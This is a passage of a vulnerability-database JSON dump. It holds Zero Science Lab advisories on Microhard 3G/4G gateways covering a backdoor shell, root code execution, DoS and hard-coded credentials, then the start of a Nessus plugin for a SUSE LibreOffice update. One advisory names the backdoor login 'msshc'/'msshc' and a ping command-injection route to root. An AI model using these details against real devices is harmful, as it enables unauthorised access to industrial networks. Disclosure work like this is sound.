"http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_csrf.txt"}, {"lastseen": "2019-04-02T04:51:22", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak \nAdvisory ID: [ZSL-2018-5486](<ZSL-2018-5486.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe web shell application includes a service called Microhard Sh that is documented only as 'reserved for internal use'. This service can be enabled by an authenticated user within the Services menu in the web admin panel. This can also be enabled via CSRF attack. When the service is enabled, a user 'msshc' is created on the system with password 'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP jailed environment, that has limited commands for file transfer administration. One of the commands is a custom added 'ping' command that has a command injection vulnerability that allows the attacker to escape the restricted environment and enter into a root shell terminal that can execute commands as the root user. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_backdoor.txt](<../../codes/microhard_backdoor.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45041/> \n[2] <https://cxsecurity.com/issue/WLB-2018070171> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146619> \n[4] <https://packetstormsecurity.com/files/148575>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5486", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_backdoor.txt"}, {"lastseen": "2019-03-20T18:10:07", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit \nAdvisory ID: [ZSL-2018-5479](<ZSL-2018-5479.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe application suffers from multiple authenticated arbitrary remote code execution vulnerabilities with highest privileges. This is due to multiple hidden and undocumented features within the admin interface that allows an attacker to create crontab jobs and/or modify the system startup script that allows execution of arbitrary code as root user. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_rce.txt](<../../codes/microhard_rce.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45038/> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146620> \n[3] [https://packetstormsecurity.com/files/148563 \n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: ](<https://packetstormsecurity.com/files/148563>)<http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5479", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_rce.txt"}, {"lastseen": "2019-03-20T18:10:11", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS \nAdvisory ID: [ZSL-2018-5481](<ZSL-2018-5481.php>) \nType: Local/Remote \nImpact: DoS \nRisk: (4/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThere is an undocumented and hidden feature that allows an authenticated attacker to list running processes in the operating system and send arbitrary signals to kill any process running in the background including starting and stopping system services. This impacts availability and can be triggered also by CSRF attacks that requires device restart and/or factory reset to rollback malicious changes. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_dos.txt](<../../codes/microhard_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45035/> \n[2] <https://packetstormsecurity.com/files/148568> \n[3] <https://cxsecurity.com/issue/WLB-2018070163> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146625>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5481", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_dos.txt"}, {"lastseen": "2019-03-25T17:34:04", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials \nAdvisory ID: [ZSL-2018-5480](<ZSL-2018-5480.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe devices utilizes hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the gateway. Another vulnerability could allow an authenticated attacker to gain root access. The vulnerability is due to default credentials. An attacker could exploit this vulnerability by logging in using the default credentials. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_default.txt](<../../codes/microhard_default.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146622> \n[2] <https://www.exploit-db.com/exploits/45040/> \n[3] <https://packetstormsecurity.com/files/148564> \n[4] <https://cxsecurity.com/issue/WLB-2018070166>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5480", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_default.txt"}], "nessus": [{"lastseen": "2019-02-21T01:38:47", "bulletinFamily": "scanner", "description": "LibreOffice was updated to version 6.0.3. Following new features were added :\n\n - The Notebookbar, although still an experimental feature, has been enriched with two new variants: Grouped Bar Full for Writer, Calc and Impress, and Tabbed Compact for Writer. The Special Characters dialog has been reworked, with the addition of lists for Recent and Favorite characters, along with a Search field. The Customize dialog has also been redesigned, and is now more modern and intuitive.\n\n - In Writer, a Form menu has been added, making it easier to access one of the most powerful Ã¢ÂÂ and often unknown Ã¢ÂÂ\n LibreOffice features: the ability to design forms, and create standards-compliant PDF forms. The Find toolbar has been enhanced with a drop-down list of search types, to speed up navigation. A new default table style has been added, together with a new collection of table styles to reflect evolving visual trends.\n\n - The Mail Merge function has been improved, and it is now possible to use either a Writer document or an XLSX file as data source.\n\n - In Calc, ODF 1.2-compliant functions SEARCHB, FINDB and REPLACEB have been added, to improve support for the ISO standard format. Also, a cell range selection or a selected group of shapes (images) can be now exported in PNG or JPG format.\n\n - In Impress, the default slide size has been switched to 16:9, to support the most recent form factors of screens and projectors. As a consequence, 10 new Impress templates have been added, and a couple of old templates have been updated. Changes in components :\n\n - The old WikiHelp has been replaced by the new Help Online system, with attractive web pages that can also be displayed on mobile devices. In general, LibreOffice Help has been updated both in terms of contents and code, with other improvements due all along the life of the LibreOffice 6 family.\n\n - User dictionaries now allow automatic affixation or compounding. This is a general spell checking improvement in LibreOffice which can speed up work for Writer users. Instead of manually handling several forms of a new word in a language with rich morphology or compounding, the Hunspell spell checker can automatically recognize a new word with affixes or compounds, based on a Ã¢ÂÂGrammar ByÃ¢ÂÂ model.\n Security features and changes :\n\n - OpenPGP keys can be used to sign ODF documents on all desktop operating systems, with experimental support for OpenPGP-based encryption. To enable this feature, users will have to install the specific GPG software for their operating systems.\n\n - Document classification has also been improved, and allows multiple policies (which are now exported to OOXML files). In Writer, marking and signing are now supported at paragraph level. Interoperability changes :\n\n - OOXML interoperability has been improved in several areas: import of SmartArt and import/export of ActiveX controls, support of embedded text documents and spreadsheets, export of embedded videos to PPTX, export of cross-references to DOCX, export of MailMerge fields to DOCX, and improvements to the PPTX filter to prevent the creation of broken files.\n\n - New filters for exporting Writer documents to ePub and importing QuarkXPress files have also been added, together with an improved filter for importing EMF+ (Enhanced Metafile Format Plus) files as used by Microsoft Office documents. Some improvements have also been added to the ODF export filter, making it easier for other ODF readers to display visuals. The full blog entry for the 6.0 release can be found here:\n 	https://blog.documentfoundation.org/blog/2018/01/31/ libreoffice-6/ The full release notes can be found here:\n 	https://wiki.documentfoundation.org/ReleaseNotes/6.0 The libraries that LibreOffice depends on also have been udpated to their current versions.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1076-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=109357", "published": "2018-04-26T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : Recommended update for LibreOffice (SUSE-SU-2018:1076-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1076-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109357);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-9432\", \"CVE-2017-9433\", \"CVE-2018-1055\", \"CVE-2018-6871\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : Recommended update for LibreOffice (SUSE-SU-2018:1076-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"LibreOffice was updated to version 6.0.3. Following new features were\nadded :\n\n - The Notebookbar, although still an experimental feature,\n has been enriched with two new variants: Grouped Bar\n Full for Writer, Calc and Impress, and Tabbed Compact\n for Writer. The Special Characters dialog has been\n reworked, with the addition of lists for Recent and\n Favorite characters, along with a Search field. The\n Customize dialog has also been redesigned, and is now\n more modern and intuitive.\n\n - In Writer, a Form menu has been added, making it easier\n to access one of the most powerful\n Ã¢ÂÂ and often\n unknown Ã¢ÂÂ\n LibreOffice features: the ability to design forms, and\n create standards-compliant PDF forms. The Find toolbar\n has been enhanced with a drop-down list of search types,\n to speed up navigation. A new default table style has\n been added, together with a new collection of table\n styles to reflect evolving visual trends.\n\n - The Mail Merge function has been improved, and it is now\n possible to use either a Writer document or an XLSX file\n as data source.\n\n - In Calc, ODF 1.2-compliant functions SEARCHB, FINDB and\n REPLACEB have been added, to improve support for the ISO\n standard format. Also, a cell range selection or a\n selected group of shapes (images) can be now exported in\n PNG or JPG format.\n\n - In Impress, the default slide size has been switched to\n 16:9, to support the most recent form factors of screens\n and projectors. As a consequence, 10 new Impress\n templates have been added, and a couple of old templates\n have been updated. Changes in components :\n\n - The old WikiHelp has been replaced by the new Help\n Online system, with attractive web pages that can also\n be displayed on mobile devices. In general, LibreOffice\n Help has been updated both in terms of contents and\n code, with other improvements due all along the life of\n the LibreOffice 6 family.\n\n - User dictionaries now allow automatic affixation or\n compounding. This is a general spell checking\n improvement in LibreOffice which can speed up work for\n Writer users. Instead of manually handling several forms\n of a new word in a language with rich morphology or\n compounding, the Hunspell spell checker can\n automatically recognize a new word with affixes or\n compounds, based on a\n Ã¢ÂÂGrammar\n ByÃ¢ÂÂ model.\n Security features and changes :\n\n - OpenPGP keys can be used to sign ODF documents on all\n desktop operating systems, with experimental support for\n OpenPGP-based encryption. To enable this feature, users\n will have to install the specific GPG software for their\n operating systems.\n\n - Document classification has also been improved, and\n allows multiple policies (which are now exported to\n OOXML files). In Writer, marking and signing are now\n supported at paragraph level. Interoperability changes :\n\n - OOXML interoperability has been improved in several\n areas: import of SmartArt and import/export of ActiveX\n controls, support of embedded text documents and\n spreadsheets, export of embedded videos to PPTX, export\n of cross-references to DOCX, export of MailMerge fields\n to DOCX, and improvements to the PPTX filter to prevent\n the creation of broken files.\n\n - New filters for exporting Writer documents to ePub and\n importing QuarkXPress files have also been added,\n together with an improved filter for importing EMF+\n (Enhanced Metafile Format Plus) files as used by\n Microsoft Office documents. Some improvements have also\n been added to the ODF export filter, making it easier\n for other ODF readers to display visuals. The full blog\n entry for the 6.0 release can be found here:\n 	https://blog.documentfoundation.org/blog/2018/01/31/\n libreoffice-6/ The full release notes can be found here:\n 	https://wiki.documentfoundation.org/ReleaseNotes/6.0\n The libraries that LibreOffice depends on also have been\n udpated to their current versions.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.documentfoundation.org/blog/2018/01/31/libreoffice-6/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://wiki.documentfoundation.org/ReleaseNotes/6.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9432/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1055/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-6871/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181076-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?94e071c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-735=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-735=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-735=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-735=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 